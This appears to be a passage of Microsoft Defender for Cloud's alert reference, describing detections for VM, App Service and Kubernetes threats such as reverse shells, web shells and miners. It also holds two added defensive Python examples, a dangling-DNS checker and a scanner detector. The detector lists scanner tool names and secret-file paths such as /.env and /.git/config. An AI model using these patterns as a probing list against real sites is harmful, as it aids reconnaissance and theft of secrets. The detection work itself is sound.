| Antimalware unusual file exclusion in your virtual machine (VM_UnusualAmFileExclusion) | Unusual file exclusion from antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Behavior similar to ransomware detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected the execution of files that have resemblance of known ransomware that can prevent users from accessing their system or personal files, and demands ransom payment in order to regain access. This behavior was seen [x] times today on the following machines: [Machine names] | - | High |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Communication with suspicious domain identified by threat intelligence (AzureDNS_ThreatIntelSuspectDomain) | Communication with suspicious domain was detected by analyzing DNS transactions from your resource and comparing against known malicious domains identified by threat intelligence feeds. Communication to malicious domains is frequently performed by attackers and could imply that your resource is compromised. | Initial Access, Persistence, Execution, Command And Control, Exploitation | Medium |
| Container with a miner image detected (VM_MinerInContainerImage) | Machine logs indicate execution of a Docker container that runs an image associated with digital currency mining. | Execution | High |
| Custom script extension with suspicious command in your virtual machine (VM_CustomScriptExtensionSuspiciousCmd) | Custom script extension with suspicious command was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extension to execute malicious code on your virtual machine via the Azure Resource Manager. | Execution | Medium |
| Custom script extension with suspicious entry-point in your virtual machine (VM_CustomScriptExtensionSuspiciousEntryPoint) | Custom script extension with a suspicious entry-point was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. The entry-point refers to a suspicious GitHub repository. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Custom script extension with suspicious payload in your virtual machine (VM_CustomScriptExtensionSuspiciousPayload) | Custom script extension with a payload from a suspicious GitHub repository was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Detected anomalous mix of upper and lower case characters in command line | Analysis of host data on %{Compromised Host} detected a command line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host. | - | Medium |
| Detected file download from a known malicious source | Analysis of host data has detected the download of a file from a known malware source on %{Compromised Host}. | - | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Detected suspicious network activity | Analysis of network traffic from %{Compromised Host} detected suspicious network activity. Such traffic, while possibly benign, is typically used by an attacker to communicate with malicious servers for downloading of tools, command-and-control and exfiltration of data. Typical related attacker activity includes copying remote administration tools to a compromised host and exfiltrating user data from it. | - | Low |
| Digital currency mining related behavior detected | Analysis of host data on %{Compromised Host} detected the execution of a process or command normally associated with digital currency mining. | - | High |
| Disabling of auditd logging [seen multiple times] | The Linux Audit system provides a way to track security-relevant information on the system. It records as much information about the events that are happening on your system as possible. Disabling auditd logging could hamper discovering violations of security policies used on the system. This behavior was seen [x] times today on the following machines: [Machine names] | - | Low |
| Exploitation of Xorg vulnerability [seen multiple times] | Analysis of host data on %{Compromised Host} detected the use of Xorg with suspicious arguments. Attackers may use this technique in privilege escalation attempts. This behavior was seen [x] times today on the following machines: [Machine names] | - | Medium |
| Failed SSH brute force attack (VM_SshBruteForceFailed) | Failed brute force attacks were detected from the following attackers: %{Attackers}. Attackers were trying to access the host with the following user names: %{Accounts used on failed sign in to host attempts}. | Probing | Medium |
| Fileless Attack Behavior Detected (VM_FilelessAttackBehavior.Linux) | The memory of the process specified below contains behaviors commonly used by fileless attacks. Specific behaviors include: {list of observed behaviors} | Execution | Low |
| Fileless Attack Technique Detected (VM_FilelessAttackTechnique.Linux) | The memory of the process specified below contains evidence of a fileless attack technique. Fileless attacks are used by attackers to execute code while evading detection by security software. Specific behaviors include: {list of observed behaviors} | Execution | High |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Fileless Attack Toolkit Detected (VM_FilelessAttackToolkit.Linux) | The memory of the process specified below contains a fileless attack toolkit: {ToolKitName}. Fileless attack toolkits typically don't have a presence on the filesystem, making detection by traditional anti-virus software difficult. Specific behaviors include: {list of observed behaviors} | Defense Evasion, Execution | High |
| Hidden file execution detected | Analysis of host data indicates that a hidden file was executed by %{user name}. This activity could either be legitimate activity, or an indication of a compromised host. | - | Informational |
| New SSH key added [seen multiple times] (VM_SshKeyAddition) | A new SSH key was added to the authorized keys file. This behavior was seen [x] times today on the following machines: [Machine names] | Persistence | Low |
| New SSH key added | A new SSH key was added to the authorized keys file. | - | Low |
| Possible backdoor detected [seen multiple times] | Analysis of host data has detected a suspicious file being downloaded then run on %{Compromised Host} in your subscription. This activity has previously been associated with installation of a backdoor. This behavior was seen [x] times today on the following machines: [Machine names] | - | Medium |
| Possible exploitation of the mailserver detected (VM_MailserverExploitation) | Analysis of host data on %{Compromised Host} detected an unusual execution under the mail server account. | Exploitation | Medium |
| Possible malicious web shell detected | Analysis of host data on %{Compromised Host} detected a possible web shell. Attackers will often upload a web shell to a machine they've compromised to gain persistence or for further exploitation. | - | Medium |
| Possible password change using crypt-method detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected password change using crypt method. Attackers can make this change to continue access and gaining persistence after compromise. This behavior was seen [x] times today on the following machines: [Machine names] | - | Medium |
| Process associated with digital currency mining detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected the execution of a process normally associated with digital currency mining. This behavior was seen over 100 times today on the following machines: [Machine name] | - | Medium |
| Process associated with digital currency mining detected | Host data analysis detected the execution of a process that is normally associated with digital currency mining. | Exploitation, Execution | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Python encoded downloader detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected the execution of encoded Python that downloads and runs code from a remote location. This may be an indication of malicious activity. This behavior was seen [x] times today on the following machines: [Machine names] | - | Low |
| Screenshot taken on host [seen multiple times] | Analysis of host data on %{Compromised Host} detected the use of a screen capture tool. Attackers may use these tools to access private data. This behavior was seen [x] times today on the following machines: [Machine names] | - | Low |
| Shellcode detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected shellcode being generated from the command line. This process could be legitimate activity, or an indication that one of your machines has been compromised. This behavior was seen [x] times today on the following machines: [Machine names] | - | Medium |
| Successful SSH brute force attack (VM_SshBruteForceSuccess) | Analysis of host data has detected a successful brute force attack. The IP %{Attacker source IP} was seen making multiple login attempts. Successful logins were made from that IP with the following user(s): %{Accounts used to successfully sign in to host}. This means that the host may be compromised and controlled by a malicious actor. | Exploitation | High |
| Suspicious Account Creation Detected | Analysis of host data on %{Compromised Host} detected creation or use of a local account %{Suspicious account name}: this account name closely resembles a standard Windows account or group name '%{Similar To Account Name}'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator. | - | Medium |
| Suspicious failed execution of custom script extension in your virtual machine (VM_CustomScriptExtensionSuspiciousFailure) | Suspicious failure of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Such failures may be associated with malicious scripts run by this extension. | Execution | Medium |
| Suspicious kernel module detected [seen multiple times] | Analysis of host data on %{Compromised Host} detected a shared object file being loaded as a kernel module. This could be legitimate activity, or an indication that one of your machines has been compromised. This behavior was seen [x] times today on the following machines: [Machine names] | - | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Suspicious password access [seen multiple times] | Analysis of host data has detected suspicious access to encrypted user passwords on %{Compromised Host}. This behavior was seen [x] times today on the following machines: [Machine names] | - | Informational |
| Suspicious password access | Analysis of host data has detected suspicious access to encrypted user passwords on %{Compromised Host}. | - | Informational |
| Suspicious request to the Kubernetes Dashboard (VM_KubernetesDashboard) | Machine logs indicate that a suspicious request was made to the Kubernetes Dashboard. The request was sent from a Kubernetes node, possibly from one of the containers running in the node. Although this behavior can be intentional, it might indicate that the node is running a compromised container. | LateralMovement | Medium |
| Unusual config reset in your virtual machine (VM_VMAccessUnusualConfigReset) | An unusual config reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing VM Access extension to reset the configuration in your virtual machine and compromise it. | Credential Access | Medium |
| Unusual deletion of custom script extension in your virtual machine (VM_CustomScriptExtensionUnusualDeletion) | Unusual deletion of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Unusual execution of custom script extension in your virtual machine (VM_CustomScriptExtensionUnusualExecution) | Unusual execution of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Unusual user password reset in your virtual machine (VM_VMAccessUnusualPasswordReset) | An unusual user password reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing the VM Access extension to reset the credentials of a local user in your virtual machine and compromise it. | Credential Access | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Unusual user SSH key reset in your virtual machine (VM_VMAccessUnusualSSHReset) | An unusual user SSH key reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing VM Access extension to reset the SSH key of a user account in your virtual machine and compromise it. | Credential Access | Medium |


Alerts for Azure App Service 


Further details and notes 


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| An attempt to run Linux commands on a Windows App Service (AppServices_LinuxCommandOnWindows) | Analysis of App Service processes detected an attempt to run a Linux command on a Windows App Service. This action was run by the web application. This behavior is often seen during campaigns that exploit a vulnerability in a common web application. (Applies to: App Service on Windows) | - | Medium |
| An IP that connected to your Azure App Service FTP Interface was found in Threat Intelligence (AppServices_IncomingTiClientIpFtp) | Azure App Service FTP log indicates a connection from a source address that was found in the threat intelligence feed. During this connection, a user accessed the pages listed. (Applies to: App Service on Windows and App Service on Linux) | Initial Access | Medium |
| Attempt to run high privilege command detected (AppServices_HighPrivilegeCommand) | Analysis of App Service processes detected an attempt to run a command that requires high privileges. The command ran in the web application context. While this behavior can be legitimate, in web applications this behavior is also observed in malicious activities. (Applies to: App Service on Windows) | - | Medium |
| Communication with suspicious domain identified by threat intelligence (AzureDNS_ThreatIntelSuspectDomain) | Communication with suspicious domain was detected by analyzing DNS transactions from your resource and comparing against known malicious domains identified by threat intelligence feeds. Communication to malicious domains is frequently performed by attackers and could imply that your resource is compromised. | Initial Access, Persistence, Execution, Command And Control, Exploitation | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Connection to web page from anomalous IP address detected (AppServices_AnomalousPageAccess) | Azure App Service activity log indicates an anomalous connection to a sensitive web page from the listed source IP address. This might indicate that someone is attempting a brute force attack into your web app administration pages. It might also be the result of a new IP address being used by a legitimate user. If the source IP address is trusted, you can safely suppress this alert for this resource. To learn how to suppress security alerts, see Suppress alerts from Microsoft Defender for Cloud. (Applies to: App Service on Windows and App Service on Linux) | Initial Access | Low |
| Dangling DNS record for an App Service resource detected (AppServices_DanglingDomain) | A DNS record that points to a recently deleted App Service resource (also known as "dangling DNS" entry) has been detected. This leaves you susceptible to a subdomain takeover. Subdomain takeovers enable malicious actors to redirect traffic intended for an organization's domain to a site performing malicious activity. (Applies to: App Service on Windows and App Service on Linux) | - | High |
| Detected encoded executable in command line data (AppServices_Base64EncodedExecutableInCommandLineParams) | Analysis of host data on {Compromised host} detected a base-64 encoded executable. This has previously been associated with attackers attempting to construct executables on-the-fly through a sequence of commands, and attempting to evade intrusion detection systems by ensuring that no individual command would trigger an alert. This could be legitimate activity, or an indication of a compromised host. (Applies to: App Service on Windows) | Defense Evasion, Execution | High |
| Detected file download from a known malicious source (AppServices_SuspectDownload) | Analysis of host data has detected the download of a file from a known malware source on your host. (Applies to: App Service on Linux) | Privilege Escalation, Execution, Exfiltration, Command and Control | Medium |
| Detected suspicious file download (AppServices_SuspectDownloadArtifacts) | Analysis of host data has detected suspicious download of remote file. (Applies to: App Service on Linux) | Persistence | Medium |
| Digital currency mining related behavior detected (AppServices_DigitalCurrencyMining) | Analysis of host data on Inn-Flow-WebJobs detected the execution of a process or command normally associated with digital currency mining. (Applies to: App Service on Windows and App Service on Linux) | Execution | High |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Executable decoded using certutil (AppServices_ExecutableDecodedUsingCertutil) | Analysis of host data on [Compromised entity] detected that certutil.exe, a built-in administrator utility, was being used to decode an executable instead of its mainstream purpose that relates to manipulating certificates and certificate data. Attackers are known to abuse functionality of legitimate administrator tools to perform malicious actions, for example using a tool such as certutil.exe to decode a malicious executable that will then be subsequently executed. (Applies to: App Service on Windows) | Defense Evasion, Execution | High |
| Fileless Attack Behavior Detected (AppServices_FilelessAttackBehaviorDetection) | The memory of the process specified below contains behaviors commonly used by fileless attacks. Specific behaviors include: {list of observed behaviors} (Applies to: App Service on Windows and App Service on Linux) | Execution | Medium |
| Fileless Attack Technique Detected (AppServices_FilelessAttackTechniqueDetection) | The memory of the process specified below contains evidence of a fileless attack technique. Fileless attacks are used by attackers to execute code while evading detection by security software. Specific behaviors include: {list of observed behaviors} (Applies to: App Service on Windows and App Service on Linux) | Execution | High |
| Fileless Attack Toolkit Detected (AppServices_FilelessAttackToolkitDetection) | The memory of the process specified below contains a fileless attack toolkit: {ToolKitName}. Fileless attack toolkits typically do not have a presence on the filesystem, making detection by traditional anti-virus software difficult. Specific behaviors include: {list of observed behaviors} (Applies to: App Service on Windows and App Service on Linux) | Defense Evasion, Execution | High |
| Microsoft Defender for Cloud test alert for App Service (not a threat) (AppServices_EICAR) | This is a test alert generated by Microsoft Defender for Cloud. No further action is needed. (Applies to: App Service on Windows and App Service on Linux) | - | High |
| NMap scanning detected (AppServices_Nmap) | Azure App Service activity log indicates a possible web fingerprinting activity on your App Service resource. The suspicious activity detected is associated with NMAP. Attackers often use this tool for probing the web application to find vulnerabilities. (Applies to: App Service on Windows and App Service on Linux) | PreAttack | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Phishing content hosted on Azure Webapps (AppServices_PhishingContent) | URL used for phishing attack found on the Azure AppServices website. This URL was part of a phishing attack sent to Microsoft 365 customers. The content typically lures visitors into entering their corporate credentials or financial information into a legitimate looking website. (Applies to: App Service on Windows and App Service on Linux) | Collection | High |
| PHP file in upload folder (AppServices_PhpInUploadFolder) | Azure App Service activity log indicates an access to a suspicious PHP page located in the upload folder. This type of folder doesn't usually contain PHP files. The existence of this type of file might indicate an exploitation taking advantage of arbitrary file upload vulnerabilities. (Applies to: App Service on Windows and App Service on Linux) | Execution | Medium |
| Possible Cryptocoinminer download detected (AppServices_CryptoCoinMinerDownload) | Analysis of host data has detected the download of a file normally associated with digital currency mining. (Applies to: App Service on Linux) | Defense Evasion, Command and Control, Exploitation | Medium |
| Possible data exfiltration detected (AppServices_DataEgressArtifacts) | Analysis of host/device data detected a possible data egress condition. Attackers will often egress data from machines they have compromised. (Applies to: App Service on Linux) | Collection, Exfiltration | Medium |
| Potential dangling DNS record for an App Service resource detected (AppServices_PotentialDanglingDomain) | A DNS record that points to a recently deleted App Service resource (also known as "dangling DNS" entry) has been detected. This might leave you susceptible to a subdomain takeover. Subdomain takeovers enable malicious actors to redirect traffic intended for an organization's domain to a site performing malicious activity. In this case, a text record with the Domain Verification ID was found. Such text records prevent subdomain takeover but we still recommend removing the dangling domain. If you leave the DNS record pointing at the subdomain you're at risk if anyone in your organization deletes the TXT file or record in the future. (Applies to: App Service on Windows and App Service on Linux) | - | Low |
| Potential reverse shell detected (AppServices_ReverseShell) | Analysis of host data detected a potential reverse shell. These are used to get a compromised machine to call back into a machine an attacker owns. (Applies to: App Service on Linux) | Exfiltration, Exploitation | Medium |
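As an added example (not Defender for Cloud's own detection logic), the check below classifies custom domains the way the two dangling-DNS alerts above distinguish them: a CNAME to a deleted App Service host with no verification TXT record, versus one where the asuid.<domain> TXT record carrying the Domain Verification ID is still present. The DNS zone and the list of surviving App Service hostnames are constructed stand-ins; a real run would resolve DNS and read the inventory from Azure Resource Manager.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed stand-in for DNS: name -> {record type: [values]}.
# Everything is embedded so the example runs offline.
DNS_ZONE: Dict[str, Dict[str, List[str]]] = {
    "shop.example.com": {"CNAME": ["old-shop.azurewebsites.net."]},
    "blog.example.com": {"CNAME": ["old-blog.azurewebsites.net."]},
    "asuid.blog.example.com": {"TXT": ["CONSTRUCTED-DOMAIN-VERIFICATION-ID"]},
    "www.example.com": {"CNAME": ["live-site.azurewebsites.net."]},
    "mail.example.com": {"MX": ["10 mx.example.com."]},
}

# Constructed inventory: App Service default hostnames that still exist.
LIVE_APP_SERVICE_HOSTS = {"live-site.azurewebsites.net"}

APP_SERVICE_SUFFIX = ".azurewebsites.net"


@dataclass
class Finding:
    domain: str
    target: Optional[str]
    verdict: str  # "ok", "dangling" or "potential-dangling"
    reason: str


def lookup(name: str, rtype: str) -> List[str]:
    """Return the values of one record type for a name (constructed resolver)."""
    return DNS_ZONE.get(name.lower(), {}).get(rtype, [])


def classify(domain: str) -> Finding:
    """Mirror the distinction the two alerts make.

    dangling:           CNAME -> deleted App Service host and no asuid TXT
                        record, so whoever claims that hostname gets the traffic.
    potential-dangling: same CNAME, but the asuid.<domain> TXT record with the
                        Domain Verification ID is still present; it blocks
                        another subscription from binding the hostname, but the
                        CNAME should still be removed.
    """
    cnames = lookup(domain, "CNAME")
    if not cnames:
        return Finding(domain, None, "ok", "no CNAME record")
    target = cnames[0].lower().rstrip(".")
    if not target.endswith(APP_SERVICE_SUFFIX):
        return Finding(domain, target, "ok", "CNAME does not point at App Service")
    if target in LIVE_APP_SERVICE_HOSTS:
        return Finding(domain, target, "ok", "App Service resource still exists")
    if lookup(f"asuid.{domain}", "TXT"):
        return Finding(domain, target, "potential-dangling",
                       "deleted App Service target, asuid TXT record still present")
    return Finding(domain, target, "dangling",
                   "deleted App Service target and no asuid TXT record")


def audit(domains: List[str]) -> Dict[str, str]:
    """Verdict per domain for the domains that need attention, worst first."""
    order = {"dangling": 0, "potential-dangling": 1, "ok": 2}
    findings = sorted((classify(d) for d in domains), key=lambda f: order[f.verdict])
    return {f.domain: f.verdict for f in findings if f.verdict != "ok"}


if __name__ == "__main__":
    for f in (classify(d) for d in DNS_ZONE):
        print(f"{f.domain:25} {f.verdict:18} {f.reason}")
```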


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Raw data download detected (AppServices_DownloadCodeFromWebsite) | Analysis of App Service processes detected an attempt to download code from raw-data websites such as Pastebin. This action was run by a PHP process. This behavior is associated with attempts to download web shells or other malicious components to the App Service. (Applies to: App Service on Windows) | Execution | Medium |
| Saving curl output to disk detected (AppServices_CurlToDisk) | Analysis of App Service processes detected the running of a curl command in which the output was saved to the disk. While this behavior can be legitimate, in web applications this behavior is also observed in malicious activities such as attempts to infect websites with web shells. (Applies to: App Service on Windows) | - | Low |
| Spam folder referrer detected (AppServices_SpamReferrer) | Azure App Service activity log indicates web activity that was identified as originating from a web site associated with spam activity. This can occur if your website is compromised and used for spam activity. (Applies to: App Service on Windows and App Service on Linux) | - | Low |
| Suspicious access to possibly vulnerable web page detected (AppServices_ScanSensitivePage) | Azure App Service activity log indicates a web page that seems to be sensitive was accessed. This suspicious activity originated from a source IP address whose access pattern resembles that of a web scanner. This activity is often associated with an attempt by an attacker to scan your network to try to gain access to sensitive or vulnerable web pages. (Applies to: App Service on Windows and App Service on Linux) | - | Low |
| Suspicious domain name reference (AppServices_CommandlineSuspectDomain) | Analysis of host data detected reference to suspicious domain name. Such activity, while possibly legitimate user behavior, is frequently an indication of the download or execution of malicious software. Typical related attacker activity is likely to include the download and execution of further malicious software or remote administration tools. (Applies to: App Service on Linux) | Exfiltration | Low |



Suspicious download using Certutil detected (AppServices_DownloadUsingCertutil)
Description: Analysis of host data on {NAME} detected the use of certutil.exe, a built-in administrator utility, for the download of a binary instead of its mainstream purpose of manipulating certificates and certificate data. Attackers are known to abuse the functionality of legitimate administrator tools to perform malicious actions, for example using certutil.exe to download and decode a malicious executable that is then executed.
(Applies to: App Service on Windows)
MITRE tactics: Execution
Severity: Medium

Suspicious PHP execution detected (AppServices_SuspectPhp)
Description: Machine logs indicate that a suspicious PHP process is running. The action included an attempt to run operating system commands or PHP code from the command line, by using the PHP process. While this behavior can be legitimate, in web applications it might indicate malicious activities, such as attempts to infect websites with web shells.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: Execution
Severity: Medium

Suspicious PowerShell cmdlets executed (AppServices_PowerShellPowerSploitScriptExecution)
Description: Analysis of host data indicates execution of known malicious PowerShell PowerSploit cmdlets.
(Applies to: App Service on Windows)
MITRE tactics: Execution
Severity: Medium

Suspicious process executed (AppServices_KnownCredentialAccessTools)
Description: Machine logs indicate that the suspicious process '%{process path}' was running on the machine. This process is often associated with attacker attempts to access credentials.
(Applies to: App Service on Windows)
MITRE tactics: Credential Access
Severity: High

Suspicious process name detected (AppServices_ProcessWithKnownSuspiciousExtension)
Description: Analysis of host data on {NAME} detected a process whose name is suspicious, for example corresponding to a known attacker tool or named in a way that is suggestive of attacker tools that try to hide in plain sight. This process could be legitimate activity, or an indication that one of your machines has been compromised.
(Applies to: App Service on Windows)
MITRE tactics: Persistence, Defense Evasion
Severity: Medium

Suspicious SVCHOST process executed (AppServices_SVCHostFromInvalidPath)
Description: The system process SVCHOST was observed running in an abnormal context. Malware often uses SVCHOST to mask its malicious activity.
(Applies to: App Service on Windows)
MITRE tactics: Defense Evasion, Execution
Severity: High


Suspicious User Agent detected (AppServices_UserAgentInjection)
Description: Azure App Service activity log indicates requests with a suspicious user agent. This behavior can indicate attempts to exploit a vulnerability in your App Service application.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: Initial Access
Severity: Medium

Suspicious WordPress theme invocation detected (AppServices_WpThemeInjection)
Description: Azure App Service activity log indicates a possible code injection activity on your App Service resource. The suspicious activity detected resembles a manipulation of a WordPress theme to support server-side execution of code, followed by a direct web request to invoke the manipulated theme file. This type of activity was seen in the past as part of an attack campaign over WordPress. If your App Service resource isn't hosting a WordPress site, it isn't vulnerable to this specific code injection exploit and you can safely suppress this alert for the resource. To learn how to suppress security alerts, see Suppress alerts from Microsoft Defender for Cloud.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: Execution
Severity: High

Vulnerability scanner detected (AppServices_DrupalScanner)
Description: Azure App Service activity log indicates that a possible vulnerability scanner was used on your App Service resource. The suspicious activity detected resembles that of tools targeting a content management system (CMS). If your App Service resource isn't hosting a Drupal site, it isn't vulnerable to this specific code injection exploit and you can safely suppress this alert for the resource. To learn how to suppress security alerts, see Suppress alerts from Microsoft Defender for Cloud.
(Applies to: App Service on Windows)
MITRE tactics: PreAttack
Severity: Low

Vulnerability scanner detected (AppServices_JoomlaScanner)
Description: Azure App Service activity log indicates that a possible vulnerability scanner was used on your App Service resource. The suspicious activity detected resembles that of tools targeting Joomla applications. If your App Service resource isn't hosting a Joomla site, it isn't vulnerable to this specific code injection exploit and you can safely suppress this alert for the resource. To learn how to suppress security alerts, see Suppress alerts from Microsoft Defender for Cloud.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: PreAttack
Severity: Low


Vulnerability scanner detected (AppServices_WpScanner)
Description: Azure App Service activity log indicates that a possible vulnerability scanner was used on your App Service resource. The suspicious activity detected resembles that of tools targeting WordPress applications. If your App Service resource isn't hosting a WordPress site, it isn't vulnerable to this specific code injection exploit and you can safely suppress this alert for the resource. To learn how to suppress security alerts, see Suppress alerts from Microsoft Defender for Cloud.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: PreAttack
Severity: Low

Web fingerprinting detected (AppServices_WebFingerprinting)
Description: Azure App Service activity log indicates a possible web fingerprinting activity on your App Service resource. The suspicious activity detected is associated with a tool called Blind Elephant. The tool fingerprints web servers and tries to detect the installed applications and their versions. Attackers often use this tool to probe the web application for vulnerabilities.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: PreAttack
Severity: Medium

Website is tagged as malicious in threat intelligence feed (AppServices_SmartScreen)
Description: Your website, as described below, is marked as a malicious site by Windows SmartScreen. If you think this is a false positive, contact Windows SmartScreen via the report feedback link provided.
(Applies to: App Service on Windows and App Service on Linux)
MITRE tactics: Collection
Severity: Medium
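The scanner, fingerprinting and sensitive-page alerts above are all raised from the App Service activity (HTTP) log. The following is an added example, not Defender for Cloud's detection logic, that applies the same two ideas to a constructed access log: a known tool name in the User-Agent, and one source IP touching several sensitive or CMS-specific paths inside a short window. It also implements the suppression the page recommends: a CMS-specific scanner hitting an app that does not host that CMS is marked suppressed. The log format, the sensitive-path list, the tool names other than Blind Elephant and WPScan, and the window and threshold are assumptions.

```python
"""Added example (not Defender for Cloud's detection logic): flag scanner and
fingerprinting user agents and sensitive-page probing in App Service HTTP logs.
The log format, tool names, sensitive paths and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one request per line: time client_ip method path status user_agent
SAMPLE_LOG = """\
2023-07-24T10:00:01Z 203.0.113.7 GET /wp-login.php 404 Mozilla/5.0
2023-07-24T10:00:02Z 203.0.113.7 GET /administrator/ 404 Mozilla/5.0
2023-07-24T10:00:03Z 203.0.113.7 GET /user/login 404 Mozilla/5.0
2023-07-24T10:00:04Z 203.0.113.7 GET /.env 403 Mozilla/5.0
2023-07-24T10:00:05Z 203.0.113.7 GET /.git/config 404 Mozilla/5.0
2023-07-24T10:05:00Z 198.51.100.9 GET /index.html 200 BlindElephant/1.0
2023-07-24T10:06:00Z 198.51.100.9 GET /readme.html 200 WPScan v3.8
2023-07-24T10:07:00Z 192.0.2.44 GET /index.html 200 Mozilla/5.0 (Windows NT 10.0)
2023-07-24T11:30:00Z 192.0.2.44 GET /wp-login.php 200 Mozilla/5.0 (Windows NT 10.0)
"""

# Tool names matched as substrings of the User-Agent. Blind Elephant and WPScan are
# named on the page; joomscan and droopescan are assumed. Value: the CMS the tool
# targets, or None for a generic fingerprinting tool.
SCANNER_UA = {"blindelephant": None, "wpscan": "wordpress",
              "joomscan": "joomla", "droopescan": "drupal"}

# Paths an attacker probes for admin pages or leaked files (assumed list).
SENSITIVE_PATHS = [
    re.compile(r"^/(wp-login\.php|wp-admin(?:/|$)|xmlrpc\.php|readme\.html)"),  # WordPress
    re.compile(r"^/administrator(?:/|$)"),                                       # Joomla
    re.compile(r"^/user/login"),                                                 # Drupal
    re.compile(r"^/(\.env|\.git/|phpmyadmin)"),                                  # leaked files / admin tools
]


def parse_line(line):
    ts, ip, _method, path, status, ua = line.split(maxsplit=5)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, path, int(status), ua


def is_sensitive(path):
    return any(rx.match(path) for rx in SENSITIVE_PATHS)


def detect(log_text, hosted_cms=frozenset(), window=timedelta(minutes=10), threshold=3):
    """Return findings as dicts; `hosted_cms` drives the suppression the page describes."""
    findings, probes = [], defaultdict(list)
    for line in log_text.splitlines():
        ts, ip, path, _status, ua = parse_line(line)
        ua_lower = ua.lower()
        for tool, cms in SCANNER_UA.items():
            if tool in ua_lower:
                findings.append({
                    "alert": "Vulnerability scanner / web fingerprinting detected",
                    "ip": ip, "evidence": ua,
                    # A CMS-specific scanner against an app that doesn't host that CMS
                    # can be suppressed; a generic fingerprinting tool never is.
                    "suppressed": cms is not None and cms not in hosted_cms,
                })
        if is_sensitive(path):
            probes[ip].append((ts, path))
    # Scanner-like pattern: >= threshold distinct sensitive paths from one IP inside `window`.
    for ip, hits in probes.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            distinct = {p for t, p in hits[i:] if t - t0 <= window}
            if len(distinct) >= threshold:
                findings.append({"alert": "Suspicious access to sensitive pages (scanner-like pattern)",
                                 "ip": ip, "evidence": sorted(distinct), "suppressed": False})
                break
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG, hosted_cms={"joomla"}):
        print(finding)
```

Run as-is, the single-IP probe of five distinct sensitive paths within seconds is flagged, the two scanner user agents are reported, and the WPScan hit is marked suppressed because the constructed app only hosts Joomla; the isolated `/wp-login.php` request from 192.0.2.44 is not enough to trip the window rule.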


Alerts for containers - Kubernetes clusters

Microsoft Defender for Containers provides security alerts on the cluster level and on the underlying cluster nodes by monitoring both the control plane (API server) and the containerized workload itself. Control plane security alerts can be recognized by the K8S_ prefix of the alert type. Security alerts for runtime workload in the clusters can be recognized by the K8S.NODE_ prefix of the alert type. All alerts are supported on Linux only, unless otherwise indicated.

Further details and notes

Exposed Postgres service with trust authentication configuration in Kubernetes detected (Preview) (K8S_ExposedPostgresTrustAuth)
Description: Kubernetes cluster configuration analysis detected exposure of a Postgres service by a load balancer. The service is configured with the trust authentication method, which doesn't require credentials.
MITRE tactics: InitialAccess
Severity: Medium


Exposed Postgres service with risky configuration in Kubernetes detected (Preview) (K8S_ExposedPostgresBroadIPRange)
Description: Kubernetes cluster configuration analysis detected exposure of a Postgres service by a load balancer with a risky configuration. Exposing the service to a wide range of IP addresses poses a security risk.
MITRE tactics: InitialAccess
Severity: Medium

Attempt to create a new Linux namespace from a container detected (K8S.NODE_NamespaceCreation) [1]
Description: Analysis of processes running within a container in a Kubernetes cluster detected an attempt to create a new Linux namespace. While this behavior might be legitimate, it might indicate that an attacker is trying to escape from the container to the node. Some CVE-2022-0185 exploitations use this technique.
MITRE tactics: PrivilegeEscalation
Severity: Medium

